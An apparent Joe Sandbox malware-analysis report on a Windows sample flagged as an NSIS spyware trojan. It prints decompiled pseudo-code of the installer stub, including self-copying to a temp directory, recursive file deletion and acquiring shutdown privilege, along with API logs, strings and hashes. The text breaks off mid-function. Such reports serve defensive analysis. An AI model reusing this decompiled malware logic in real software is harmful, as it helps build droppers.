												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ") {
													_t189 = E00405C39(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\jones\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C1C();
														} else {
															E00405B9F();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
														}
														E0040666E(0x7a9000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x7a9800 = _t143;
														do {
															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
															DeleteFileW(0x79f748);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe", 0x79f748, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E0040642E(_t201, 0x79f748, 0);
																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
																	_t152 = E00405C51(0x79f748);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E0040642E(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00406045(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E00403615(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E00403615(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x7a8b40 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}

0x00403654
0x00403655
0x0040365c
0x0040365f
0x00403666
0x00403669
0x0040367c
0x00403682
0x00403685
0x00403688
0x00403696
0x0040369e
0x004036a9
0x004036c2
0x004036c4
0x004036cc
0x004036cc
0x004036d7
0x004036d9
0x004036d9
0x004036ee
0x00403713
0x00403721
0x00403724
0x0040372b
0x00403732
0x00403732
0x0040372b
0x00403734
0x00403739
0x0040373a
0x00403746
0x0040374a
0x00403751
0x0040375f
0x00403764
0x0040376b
0x0040376f
0x00403773
0x00403775
0x00403775
0x00403773
0x0040377c
0x00403783
0x00403789
0x004037a1
0x004037b1
0x004037b6
0x004037bc
0x004037c3
0x004037ca
0x004037cc
0x004037cd
0x004037d7
0x004037de
0x004037e0
0x004037e2
0x004037e2
0x004037f5
0x004037f7
0x004038f1
0x004038f1
0x004038f4
0x004038f7
0x00000000
0x00000000
0x00403801
0x00403802
0x00403805
0x0040380e
0x0040380e
0x00403811
0x00403814
0x00403817
0x0040381a
0x0040381a
0x0040381a
0x0040381b
0x0040381f
0x004038df
0x004038e8
0x004038ea
0x004038ed
0x004038f0
0x004038f0
0x004038f0
0x00000000
0x00403825
0x00403826
0x00403827
0x0040382b
0x00403845
0x0040384c
0x0040385f
0x00403860
0x00403875
0x0040387a
0x0040387c
0x0040387e
0x0040389a
0x004038a1
0x004038b4
0x004038b5
0x004038ca
0x004038d0
0x004038d2
0x004038d4
0x004038dc
0x004038de
0x00000000
0x004038de
0x004038d8
0x004038da
0x004038ff
0x00403903
0x0040390c
0x00403911
0x00403917
0x00403922
0x00403924
0x00403929
0x0040392b
0x00403983
0x00403988
0x00403991
0x00403998
0x0040399b
0x00403b72
0x00403b72
0x00403b77
0x00403b80
0x00403b9d
0x00403c15
0x00403c15
0x00403c1d
0x00403c1f
0x00403c1f
0x00403c25
0x00403c25
0x00403bb4
0x00403bc0
0x00403bd1
0x00403bd8
0x00403bdf
0x00403bdf
0x00403be7
0x00403bf3
0x00403c01
0x00403c0c
0x00000000
0x00000000
0x00000000
0x00403bf5
0x00403bf5
0x00403bf6
0x00403bf8
0x00403bf9
0x00403bfa
0x00403bff
0x00403c0e
0x00403c10
0x00000000
0x00403c10
0x00000000
0x00403bff
0x00403bf3
0x00403b8a
0x00403b91
0x00403b91
0x004039a7
0x00403a4e
0x00403a4e
0x00403a5a
0x00000000
0x00403a5a
0x004039b8
0x004039c0
0x00403a12
0x00403a12
0x00403a18
0x00403a1f
0x00403a6d
0x00403a6f
0x00403a74
0x00403a76
0x00403a7e
0x00403a7e
0x00403a89
0x00403a8e
0x00403a95
0x00403a9b
0x00403a9d
0x00403b70
0x00403b70
0x00403b70
0x00000000
0x00403aa3
0x00403aa3
0x00403aa5
0x00403aa6
0x00403aaf
0x00403aa8
0x00403aa8
0x00403aa8
0x00403ab5
0x00403abd
0x00403ac4
0x00403acc
0x00403acc
0x00403ad9
0x00403ae5
0x00403aef
0x00403aef
0x00403af1
0x00403af8
0x00403b02
0x00403b0e
0x00403b14
0x00403b1a
0x00403b1d
0x00403b27
0x00403b2d
0x00403b2f
0x00403b33
0x00403b44
0x00403b4a
0x00403b4f
0x00403b51
0x00403b54
0x00403b5a
0x00403b5a
0x00403b51
0x00403b2f
0x00403b5d
0x00403b64
0x00403b64
0x00403b64
0x00403b64
0x00403b6b
0x00000000
0x00403b6b
0x00403a9d
0x00403a21
0x00403a24
0x00403a28
0x00403a2d
0x00403a2f
0x00000000
0x00000000
0x00403a3b
0x00403a46
0x00403a4b
0x00000000
0x00403a4b
0x004039c9
0x004039e1
0x004039f2
0x004039f3
0x004039f7
0x004039f9
0x00403a07
0x00403a0e
0x00000000
0x00000000
0x00000000
0x00403a0e
0x00403a10
0x00000000
0x00403a10
0x00403933
0x0040393f
0x00403944
0x00403949
0x0040394b
0x00000000
0x00000000
0x00403953
0x0040395b
0x0040396c
0x00403974
0x00403976
0x0040397b
0x0040397d
0x00000000
0x00000000
0x00000000
0x0040397d
0x00000000
0x004038da
0x00403883
0x00403885
0x00000000
0x00000000
0x00403887
0x0040388b
0x0040388f
0x00403896
0x00403896
0x00403896
0x00403896
0x00000000
0x00403896
0x00403891
0x00403894
0x00000000
0x00000000
0x00000000
0x00403894
0x0040382d
0x00403831
0x00403834
0x0040383b
0x0040383b
0x00000000
0x0040383b
0x00403836
0x00403839
0x00000000
0x00000000
0x00000000
0x00403839
0x00000000
0x00000000
0x00000000
0x00403807
0x00403807
0x00403808
0x00403809
0x00403809
0x00000000
0x00403807
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403669
GetVersionExW.KERNEL32(?), ref: 00403692
GetVersionExW.KERNEL32(0000011C), ref: 004036A9
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
OleInitialize.OLE32(00000000), ref: 00403783
SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" ,00000000), ref: 004037EF
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403922
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040393F
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403953
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040395B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
DeleteFileW.KERNELBASE(1033), ref: 00403988
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A6F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A7E

Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A89
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" ,00000000,?), ref: 00403A95
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,0079F748,00000001), ref: 00403B27
CloseHandle.KERNEL32(00000000,0079F748,0079F748,?,0079F748,00000000), ref: 00403B54
ExitProcess.KERNEL32(?), ref: 00403B72
OleUninitialize.OLE32(?), ref: 00403B77
ExitProcess.KERNEL32 ref: 00403B91
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
ExitWindowsEx.USER32 ref: 00403C04
ExitProcess.KERNEL32 ref: 00403C25

Strings

TMP, xrefs: 0040396F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040365F
C:\Users\user\AppData\Local\Temp\, xrefs: 00403917, 0040391C, 00403932, 0040393E, 0040394D, 0040395A, 00403966, 0040396E, 00403A6C, 00403A7D, 00403A88, 00403A94, 00403AA5, 00403AB4, 00403B6A
NSIS Error, xrefs: 004037A7
C:\Users\user\AppData\Local\Temp, xrefs: 00403907, 00403A36, 00403ABD, 00403AC7
Error launching installer, xrefs: 00403A18
~nsu, xrefs: 00403A67
SeShutdownPrivilege, xrefs: 00403BBA
Low, xrefs: 00403955
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe, xrefs: 00403B22
C:\Users\user\Desktop, xrefs: 00403A8E, 00403A93, 00403AC6
UXTHEME, xrefs: 00403734, 00403739, 0040373F
TEMP, xrefs: 00403967
\Temp, xrefs: 00403939
.tmp, xrefs: 00403A83
C:\Users\user\AppData\Local\Temp, xrefs: 00403A41
1033, xrefs: 00403983
"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" , xrefs: 004037BC, 004037C2, 004037D7, 004039AE, 004039BA, 00403A08, 00403A12

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-1317801814
Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00406045(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8b28 =  *0x7a8b28 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040666E(0x7a3f90, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F89(_t68);
					} else {
						lstrcatW(0x7a3f90, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040666E(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D32(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056D0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8b28 =  *0x7a8b28 + 1;
										} else {
											E004056D0(0xfffffff1, _t68);
											E0040642E(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D7A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x7a3f90 - 0x5c;
					if( *0x7a3f90 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004069A4(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F3D(_t68);
							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056D0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056D0(0xfffffff1, _t68);
							return E0040642E(_t67, _t68, 0);
						}
						L30:
						 *0x7a8b28 =  *0x7a8b28 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d84
0x00405d89
0x00405d92
0x00405d95
0x00405d9d
0x00405da0
0x00405da3
0x00405dab
0x00405dad
0x00405dae
0x00000000
0x00405dae
0x00405db9
0x00405dbc
0x00405dbc
0x00405dbc
0x00405dc0
0x00405dd3
0x00405dda
0x00405ddf
0x00405de3
0x00405df3
0x00405de5
0x00405deb
0x00405deb
0x00405df8
0x00405dfc
0x00405e08
0x00405e0e
0x00405e13
0x00405e19
0x00405e24
0x00405e2a
0x00405e2c
0x00405e2f
0x00405ed9
0x00405ed9
0x00405edd
0x00405edf
0x00405edf
0x00405edf
0x00405edf
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e35
0x00405e35
0x00405e35
0x00405e3d
0x00405e5d
0x00405e65
0x00405e6a
0x00405e71
0x00405e8c
0x00405e91
0x00405e93
0x00405eb7
0x00405e95
0x00405e95
0x00405e98
0x00405eac
0x00405e9a
0x00405e9d
0x00405ea5
0x00405ea5
0x00405e98
0x00405e73
0x00405e79
0x00405e7b
0x00405e81
0x00405e81
0x00405e7b
0x00000000
0x00405e71
0x00405e3f
0x00405e47
0x00000000
0x00000000
0x00405e49
0x00405e51
0x00000000
0x00000000
0x00405e53
0x00405e5b
0x00000000
0x00000000
0x00000000
0x00405ebc
0x00405ec4
0x00405eca
0x00405eca
0x00405ed3
0x00000000
0x00405ed3
0x00405dfe
0x00405e06
0x00000000
0x00000000
0x00000000
0x00405dc2
0x00405dc2
0x00405dc4
0x00405ee4
0x00405ee6
0x00405ee9
0x00405f3a
0x00405f3a
0x00405f3a
0x00405eeb
0x00405eee
0x00405ef9
0x00405efe
0x00405f00
0x00000000
0x00000000
0x00405f03
0x00405f0f
0x00405f14
0x00405f16
0x00000000
0x00405f31
0x00405f18
0x00405f1b
0x00000000
0x00000000
0x00405f20
0x00000000
0x00405f27
0x00405ef0
0x00405ef0
0x00000000
0x00405ef0
0x00405dca
0x00405dcd
0x00000000
0x00000000
0x00000000
0x00405dcd

APIs

DeleteFileW.KERNELBASE(?,?,76CDFAA0,76CDF560,00000000), ref: 00405DA3
lstrcatW.KERNEL32(007A3F90,\*.*), ref: 00405DEB
lstrcatW.KERNEL32(?,0040A014), ref: 00405E0E
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E14
FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E24
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
FindClose.KERNELBASE(00000000), ref: 00405ED3

Strings

., xrefs: 00405E35
\*.*, xrefs: 00405DE5
., xrefs: 00405E49

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$\*.*
API String ID: 2035342205-3749113046
Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004069A4 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004069A4(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4fd8;
			}

0x004069af
0x004069b8
0x00000000
0x004069c5
0x004069bb
0x00000000

APIs

FindFirstFileW.KERNELBASE(76CDFAA0,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004069AF
FindClose.KERNEL32(00000000), ref: 004069BB

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC

Uniqueness

Uniqueness Score: -1.00%

Function 004040CB Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f70 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8aa8 = _t127;
						 *0x7a1f84 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff50 = _t91;
						E004045CA(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88); // executed
						 *0x7a7a6c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f70 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8ac0;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404616(0x40b);
						while(1) {
							_t36 =  *0x7a1f70;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x7a8ac4;
